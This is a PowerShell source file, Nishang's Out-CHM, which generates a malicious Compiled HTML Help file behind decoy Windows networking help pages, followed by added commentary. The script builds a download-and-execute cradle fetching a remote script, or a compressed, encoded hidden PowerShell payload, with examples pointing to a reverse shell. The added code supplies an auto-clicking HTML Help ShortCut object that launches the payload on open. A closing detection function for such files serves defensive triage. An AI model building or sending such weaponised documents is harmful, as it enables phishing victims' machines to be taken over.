function Out-CHM
{
<#
.SYNOPSIS
Nishang script for creating a Compiled HTML Help file (.CHM) which can be used to run PowerShell commands and scripts.

.DESCRIPTION
The script generates a CHM file which needs to be sent to a target.
You must have hhc.exe (HTML Help Workshop) on your machine to use this script.
HTML Help Workshop is a free Microsoft tool and can be downloaded from the link below:
http://www.microsoft.com/en-us/download/details.aspx?id=21138

.PARAMETER Payload
Payload which you want to execute on the target.

.PARAMETER PayloadURL
URL of the PowerShell script which would be executed on the target.

.PARAMETER PayloadScript
Path to a PowerShell script on the local machine. Note that if the script expects any parameter, you must pass the parameters in the script itself.

.PARAMETER Arguments
Arguments to the PowerShell script to be executed on the target.

.PARAMETER HHCPath
Path to the HTML Help Workshop on the attacker's machine.

.PARAMETER OutputPath
Path to the directory where the files would be saved. Default is the current directory.

.EXAMPLE
PS > Out-CHM -Payload "Get-Process" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

The above command would execute Get-Process on the target machine when the CHM file is opened.

.EXAMPLE
PS > Out-CHM -PayloadScript C:\nishang\Shells\Invoke-PowerShellTcpOneLine.ps1 -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

Use the above when you want to use a PowerShell script as the payload. Note that if the script expects any parameter, you must pass the parameters in the script itself.

.EXAMPLE
PS > Out-CHM -PayloadURL http://192.168.254.1/Get-Information.ps1 -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

Use the above command to generate a CHM file which downloads and executes the given PowerShell script in memory on the target.

.EXAMPLE
PS > Out-CHM -Payload "-EncodedCommand <>" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

Use the above command to generate a CHM file which executes the encoded command/script. Use Invoke-Encode from Nishang to encode the command or script.

.EXAMPLE
PS > Out-CHM -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

Use the above command to pass an argument to the PowerShell script/module.

.LINK
http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
https://github.com/samratashok/nishang

.NOTES
Based on the work mentioned in this tweet by @ithurricanept
https://twitter.com/ithurricanept/status/534993743196090368
#>
    [CmdletBinding()] Param(
        [Parameter(Position = 0, Mandatory = $False)]
        [String]
        $Payload,

        [Parameter(Position = 1, Mandatory = $False)]
        [String]
        $PayloadURL,

        [Parameter(Position = 2, Mandatory = $False)]
        [String]
        $PayloadScript,

        [Parameter(Position = 3, Mandatory = $False)]
        [String]
        $Arguments,

        [Parameter(Position = 4, Mandatory = $True)]
        [String]
        $HHCPath,

        [Parameter(Position = 5, Mandatory = $False)]
        [String]
        $OutputPath = "$pwd"
    )

    #Check if the payload has been provided by the user; if not, build a download-and-execute cradle for -PayloadURL
    if(!$Payload)
    {
        $Payload = "IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
    }

    if($PayloadScript)
    {
        #Logic to read, compress and Base64 encode the payload script.
        $Enc = Get-Content $PayloadScript -Encoding Ascii

        #Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
        $ms = New-Object IO.MemoryStream
        $action = [IO.Compression.CompressionMode]::Compress
        $cs = New-Object IO.Compression.DeflateStream ($ms,$action)
        $sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
        $Enc | ForEach-Object {$sw.WriteLine($_)}
        $sw.Close()

        # Base64 encode stream
        $Compressed = [Convert]::ToBase64String($ms.ToArray())

        #Self-decompressing stub: inflate the Base64 blob in memory and hand the script to Invoke-Expression
        $command = "Invoke-Expression `$(New-Object IO.StreamReader (" +
                   "`$(New-Object IO.Compression.DeflateStream (" +
                   "`$(New-Object IO.MemoryStream (," +
                   "`$([Convert]::FromBase64String('$Compressed')))), " +
                   "[IO.Compression.CompressionMode]::Decompress))," +
                   " [Text.Encoding]::ASCII)).ReadToEnd();"

        #Generate Base64 encoded command to use with the powershell -EncodedCommand parameter (UTF-16LE, as powershell.exe expects)
        $UnicodeEncoder = New-Object System.Text.UnicodeEncoding
        $EncScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($command))

        #The payload ends up on a cmd.exe command line, which is limited to 8191 characters; 8100 leaves room for the powershell.exe switches
        if ($EncScript.Length -gt 8100)
        {
            Write-Warning "Payload too big for CHM! Try a smaller payload."
            return
        }
        else
        {
            $Payload = "powershell.exe -WindowStyle hidden -nologo -noprofile -e $EncScript"
        }
    }

    #Create the table of contents (sitemap) for the CHM
    $CHMTableOfContents = @"
"@

    #Create the Project file for the CHM
    $CHMProject = @"
[OPTIONS]
Contents file=$OutputPath\doc.hhc

[FILES]
$OutputPath\doc.htm
$OutputPath\doc1.htm
"@

    #Create the HTM files, the first one controls the payload execution.
    $CHMHTML1 = @"
Check for Windows updates from Command Line
IPv4 Advanced IP Settings Tab

You can use the settings on this tab for this network connection only if you are not using the Obtain an IP address automatically on the General tab.

IP addresses lists additional Internet Protocol version 4 (IPv4) addresses that can be assigned to this network connection. There is no limit to the number of IP addresses that can be configured. This setting is useful if this computer connects to a single physical network but requires advanced IP addressing because of either of the following reasons:

Default gateways lists IP addresses for additional default gateways that can be used by this network connection. A default gateway is a local IP router that is used to forward packets to destinations beyond the local network.

Automatic metric specifies whether TCP/IP automatically calculates a value for an interface metric that is based on the speed of the interface. The highest-speed interface has the lowest interface metric value.

Interface metric provides a location for you to type a value for the interface metric for this network connection. A lower value for the interface metric indicates a higher priority for use of this interface.

Procedures

To configure additional IP addresses for this connection
  1. In IP Addresses, click Add.

  2. Type an IP address in IP address.

  3. Type a subnet mask in Subnet mask, and then click Add.

  4. Repeat steps 1 through 3 for each IP address you want to add, and then click OK.

To configure additional default gateways for this connection
  1. On the IP Settings tab, in Default gateways, click Add.

  2. In TCP/IP Gateway Address, type the IP address of the default gateway in Gateway. To manually configure a default route metric, clear the Automatic metric check box and type a metric in Metric.

  3. Click Add.

  4. Repeat steps 1 through 3 for each default gateway you want to add, and then click OK.

To configure a custom metric for this connection
  • Clear the Automatic metric check box, and then type a metric value in Interface metric.

Additional references

For updated detailed IT pro information about TCP/IP versions 4 and 6, see http://go.microsoft.com/fwlink/?LinkID=117437 and http://go.microsoft.com/fwlink/?LinkID=71543.


"@

    #Second help topic to make the file look authentic.
    $CHMHTML2 = @"
IPv4 Advanced WINS Tab

You can use the settings on this tab for this network connection only if you are not using the Obtain an IP address automatically on the General tab.

WINS addresses, in order of use lists the Windows Internet Name Service (WINS) servers that TCP/IP queries to resolve network basic input/output system (NetBIOS) names. WINS servers are queried in the order in which they are listed here.

Enable LMHOSTS lookup specifies whether an Lmhosts file is used to resolve the NetBIOS names of remote computers to an IP address.

Click Import LMHOSTS to import a file into the Lmhosts file. The Lmhosts file is located in the %SystemRoot%\System32\Drivers\Etc folder on a Windows-based computer. There is also a sample Lmhosts file (Lmhosts.sam) in this folder. When you import LMHOSTS from a file, the original Lmhosts file is not appended to, but is overwritten by the new file.

NetBIOS setting specifies whether this network connection obtains the setting to enable or disable NetBIOS over TCP/IP (NetBT) from a Dynamic Host Configuration Protocol (DHCP) server.

When an IP address is automatically obtained, the Default option is selected so that this computer uses the NetBT setting as optionally provided by the DHCP server when this computer obtains an IP address and configuration lease. If the Disable NetBIOS over TCP/IP (NetBT) DHCP option is provided by the DHCP server, the value of the option determines whether NetBT is enabled or disabled. If the Disable NetBIOS over TCP/IP (NetBT) DHCP option is not provided by the DHCP server, NetBT is enabled.

If you are manually configuring an IP address, selecting Enable NetBIOS over TCP/IP enables NetBT. This option is not available for dial-up connections.

Procedures

To configure advanced WINS properties
  1. In WINS addresses, in order of use, click Add, type the address of the WINS server, and then click Add.

  2. Repeat step 1 for each WINS server IP address you want to add, and then click OK.

To enable the use of the Lmhosts file to resolve remote NetBIOS names
  • Select the Enable LMHOSTS lookup check box. This option is enabled by default.

To specify the location of the file that you want to import into the Lmhosts file
  • Click Import LMHOSTS, and then select the file in the Open dialog box.

To enable or disable NetBIOS over TCP/IP
  • To enable the use of NetBIOS over TCP/IP, click Enable NetBIOS over TCP/IP.

  • To disable the use of NetBIOS over TCP/IP, click Disable NetBIOS over TCP/IP.

  • To have the DHCP server determine whether NetBIOS over TCP/IP is enabled or disabled, click Default.

Additional references

For updated detailed IT pro information about TCP/IP versions 4 and 6, see http://go.microsoft.com/fwlink/?LinkID=117437 and http://go.microsoft.com/fwlink/?LinkID=71543.


"@

    #Write all files to disk for compilation
    Out-File -InputObject $CHMTableOfContents -FilePath "$OutputPath\doc.hhc" -Encoding default
    Out-File -InputObject $CHMHTML1 -FilePath "$OutputPath\doc.htm" -Encoding default
    Out-File -InputObject $CHMHTML2 -FilePath "$OutputPath\doc1.htm" -Encoding default
    Out-File -InputObject $CHMProject -FilePath "$OutputPath\doc.hhp" -Encoding default

    #Compile the CHM, only this needs to be sent to a target.
    $HHC = "$HHCPath" + "\hhc.exe"
    & "$HHC" "$OutputPath\doc.hhp"

    #Cleanup
    Remove-Item "$OutputPath\doc.hhc"
    Remove-Item "$OutputPath\doc.htm"
    Remove-Item "$OutputPath\doc1.htm"
    Remove-Item "$OutputPath\doc.hhp"
}
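The copy of the script above shows the decoy help text of the first topic but not the markup that actually launches the payload: a hidden HTML Help ActiveX control whose ShortCut command runs a program when the topic is rendered in hh.exe. The following is an added example, not Nishang's own code, that builds such a topic and compiles it with hhc.exe. Assumptions, labelled in the comments: the CLSID is the HTML Help control (HHCtrl.ocx) as documented by Microsoft, Item1 is "window,program,parameters" and Item2 is "message,wParam,lParam" (273 = WM_COMMAND); the function and parameter names are mine. Unlike the script above, every command is passed as -EncodedCommand so that quotes in the payload can never break the HTML attribute or the cmd.exe line.

```powershell
# Added example (not from the page or Nishang): payload-bearing CHM topic + compile.

function ConvertTo-EncodedPowerShell
{
    param([Parameter(Mandatory)][string]$Command)
    # powershell.exe -EncodedCommand expects Base64 of UTF-16LE text
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Command))
}

function New-ChmShortcutTopic
{
    param(
        [Parameter(Mandatory)][string]$Command,   # PowerShell to run on the target
        [string]$Title = 'IPv4 Advanced IP Settings Tab'
    )
    $enc = ConvertTo-EncodedPowerShell -Command $Command
    # Item1 becomes a cmd.exe command line, which is capped at 8191 characters
    $cmdLine = "powershell.exe -WindowStyle hidden -NoLogo -NoProfile -EncodedCommand $enc"
    if ($cmdLine.Length -gt 8100) { throw "Encoded payload too long for cmd.exe ($($cmdLine.Length) chars)" }

    # Assumed CLSID: HTML Help ActiveX control (HHCtrl.ocx). The 1x1 object is clicked
    # by the inline script as soon as the topic renders; ShortCut then runs Item1.
    @"
<!DOCTYPE html>
<html><head><title>$Title</title></head>
<body>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",cmd.exe,/c $cmdLine">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>x.Click();</SCRIPT>
<h2>$Title</h2>
<p>Decoy help text goes here.</p>
</body></html>
"@
}

function New-ChmFromTopics
{
    param(
        [Parameter(Mandatory)][string]$HHCPath,                      # e.g. "C:\Program Files (x86)\HTML Help Workshop"
        [Parameter(Mandatory)][System.Collections.IDictionary]$Topics, # file name -> HTML text (use [ordered]@{})
        [string]$OutputPath = "$pwd",
        [string]$Name = 'doc'
    )
    $hhc = Join-Path $HHCPath 'hhc.exe'
    if (-not (Test-Path $hhc)) { throw "hhc.exe not found under $HHCPath" }

    # Sitemap (.hhc) so the compiled file has a real contents pane
    $items = ($Topics.Keys | ForEach-Object {
        "<LI><OBJECT type=`"text/sitemap`"><param name=`"Name`" value=`"$_`"><param name=`"Local`" value=`"$_`"></OBJECT>"
    }) -join "`n"
    $hhcText = "<HTML><BODY><UL>`n$items`n</UL></BODY></HTML>"
    $first   = @($Topics.Keys)[0]
    $hhpText = "[OPTIONS]`nCompiled file=$Name.chm`nContents file=$Name.hhc`nDefault topic=$first`n`n[FILES]`n" + (@($Topics.Keys) -join "`n")

    Push-Location $OutputPath
    try {
        foreach ($k in $Topics.Keys) { Set-Content -Path $k -Value $Topics[$k] -Encoding ASCII }
        Set-Content -Path "$Name.hhc" -Value $hhcText -Encoding ASCII
        Set-Content -Path "$Name.hhp" -Value $hhpText -Encoding ASCII
        # hhc.exe's exit code is not a reliable success signal, so check for the artifact instead
        & $hhc "$Name.hhp" | Out-Null
        if (-not (Test-Path "$Name.chm")) { throw "hhc.exe did not produce $Name.chm" }
        Get-Item "$Name.chm"
    }
    finally {
        Remove-Item "$Name.hhc", "$Name.hhp" -ErrorAction SilentlyContinue
        foreach ($k in $Topics.Keys) { Remove-Item $k -ErrorAction SilentlyContinue }
        Pop-Location
    }
}

# Usage on a lab host with a benign command:
# $topic = New-ChmShortcutTopic -Command 'Start-Process calc.exe'
# New-ChmFromTopics -HHCPath 'C:\Program Files (x86)\HTML Help Workshop' -Topics ([ordered]@{ 'doc.htm' = $topic })
```

Because the Base64 alphabet contains no characters that cmd.exe or an HTML attribute treat specially, the same topic builder works for the -Payload, -PayloadURL and -PayloadScript cases of the script above without any per-case quoting.

The flip side, a triage check a defender would want, is also an added example rather than anything from the page: it decompiles a suspicious CHM with hh.exe -decompile (a documented switch of the HTML Help viewer) and scans the extracted topics for the HHCtrl CLSID, the ShortCut command and the launched Item1 command line. Function and field names are mine. The check is signature-based, so an obfuscated object or a different launch primitive will not be flagged, and untrusted samples should still be handled in a throwaway VM.

```powershell
# Added example (not from the page or Nishang): static indicators of the ShortCut technique in a CHM.

function Get-ChmShortcutIndicators
{
    param([Parameter(Mandatory)][string]$Path)
    $chm  = (Resolve-Path $Path).Path
    $work = Join-Path $env:TEMP ("chm-" + [guid]::NewGuid())
    New-Item -ItemType Directory -Path $work | Out-Null
    try {
        # hh.exe extracts the archive's files into $work; wait so the scan sees all of them
        Start-Process -FilePath "$env:windir\hh.exe" -ArgumentList '-decompile', "`"$work`"", "`"$chm`"" -Wait -WindowStyle Hidden

        $clsid = 'adb880a6-d8ff-11cf-9377-00aa003b7a11'                    # HTML Help control (assumed, see lead-in)
        $item1 = 'name="?Item1"?\s+value="([^"]*)"'                         # captures window,program,parameters
        Get-ChildItem -Path $work -Recurse -Include *.htm, *.html | ForEach-Object {
            $text = Get-Content -Raw -Path $_.FullName
            $hasClsid    = $text -imatch $clsid
            $hasShortcut = $text -imatch 'name="?Command"?\s+value="?ShortCut'
            if ($hasClsid -or $hasShortcut) {
                $launch = [regex]::Matches($text, $item1, 'IgnoreCase') | ForEach-Object { $_.Groups[1].Value }
                [pscustomobject]@{
                    Chm       = $chm
                    Topic     = $_.Name
                    Clsid     = [bool]$hasClsid
                    ShortCut  = [bool]$hasShortcut
                    AutoClick = [bool]($text -imatch '<script[^>]*>[^<]*\.Click\(\)')
                    Launch    = ($launch -join '; ')
                }
            }
        }
    }
    finally { Remove-Item $work -Recurse -Force -ErrorAction SilentlyContinue }
}

# Usage:
# Get-ChmShortcutIndicators -Path .\doc.chm | Format-List
```

A hit with Launch set to a cmd.exe line that invokes powershell.exe with -EncodedCommand is exactly the artifact the generator above produces; decoding the Base64 as UTF-16LE recovers the payload for further analysis.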